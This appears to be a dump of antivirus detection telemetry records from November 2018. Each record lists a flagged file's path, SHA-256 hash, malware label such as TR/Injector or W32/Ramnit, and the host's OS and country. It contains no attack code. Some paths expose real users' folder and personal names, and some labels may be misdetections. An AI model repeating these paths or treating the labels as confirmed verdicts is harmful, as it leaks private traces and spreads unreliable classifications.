  Row(detection=Row(filename='avscan-20181102-052720-f100f816', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052720-F100F816', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053836-83a384b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053836-83A384B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051818-ad775fed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051818-AD775FED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052752-03e1b7ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052752-03E1B7AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055524-dc71f6c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055524-DC71F6C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060729-8c7c61c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060729-8C7C61C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052803-0a83fa5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052803-0A83FA5A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060319-f76fbb79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060319-F76FBB79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052433-8d0a67e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052433-8D0A67E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060835-b3cbce91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060835-B3CBCE91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061511-a0279ebb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061511-A0279EBB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061525-a841c9db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061525-A841C9DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051410-1a04e89c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051410-1A04E89C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062157-92319db2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062157-92319DB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062210-99ef6d20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062210-99EF6D20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051447-3033c092', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051447-3033C092', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055502-cf9ee8d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055502-CF9EE8D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053728-5b383046', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053728-5B383046', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062408-e06160d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062408-E06160D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rlistupdater', filepath='/Applications/Advanced Mac Cleaner.app/Contents/Resources/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='86d96f4cab9f48678a6db82857c8292533a5dcf4b6f6dab988a65a001ca6a561', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054142-f2d886cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054142-F2D886CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062105-72f8f08b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062105-72F8F08B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050626-0573eacd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050626-0573EACD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050835-52653a4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050835-52653A4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052544-b7b83ba0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052544-B7B83BA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051944-e1258da6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051944-E1258DA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053756-6bea99ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053756-6BEA99AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054807-d7f9090a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054807-D7F9090A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054133-ed66afad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054133-ED66AFAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054115-e26d124e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054115-E26D124E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051203-ce218c22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051203-CE218C22', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ppttimer1.2.exe', filepath='C:\\Users\\X\\Desktop\\PPTTimer1.2.exe', filesize=512000, name='TR/Rogue.512000.37.#M1.#R1'), hash='403b2f438e3d90db363f4381a9a0494d177e12f62554d24240507d83429139e8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-01T01:55:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='garment 2013.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\ASLI\\RPG\\gaji garment 2013\\garment 2013.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184221-a5492c84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184221-A5492C84', filesize=64000, name='VBA/Dldr.Agent.pazys.#M1.#R1'), hash='406187f465c797b693447ac8993fc4b5c786ecd1d1057f9b5f53bd82b3224ef3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155022-88d4128b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155022-88D4128B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lfx270.dll', filepath='C:\\Program Files (x86)\\LEICA Geosystems\\LEICA Geo Office\\Combined\\Bin\\Lfx270.dll', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f603bae43f08ff7de78704138713f20eba0404cacbe9fc7defa95fda87d3fcd', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:29:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2[1].exe', filepath='c:\\users\\X\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ek26l0ka\\smp2[1].exe', filesize=512000, name='HEUR/AGEN.1004048.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:22:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder (2).exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\New Folder (2)\\Folder (2).exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155113-91760560', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155113-91760560', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10628173\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\plants-vs-zombies_3771639024.exe', parentsize=2488056, timestamp='2018-11-01T19:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154528-5756e3aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154528-5756E3AA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='point.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\FD\\New Folder\\fd\\notulen\\POWER POINT\\POINT.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154557-5c47b1e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154557-5C47B1E4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155051-8da9088d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155051-8DA9088D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='102613014533326.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\102613014533326.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160047-f21dcbd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160047-F21DCBD5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152414-378af4bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152031-186A31DC\\AVSCAN-20181101-152414-378AF4BB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155656-cb44c0cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155656-CB44C0CC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:57Z'), dt=datetime.date(2018, 11, 1)),
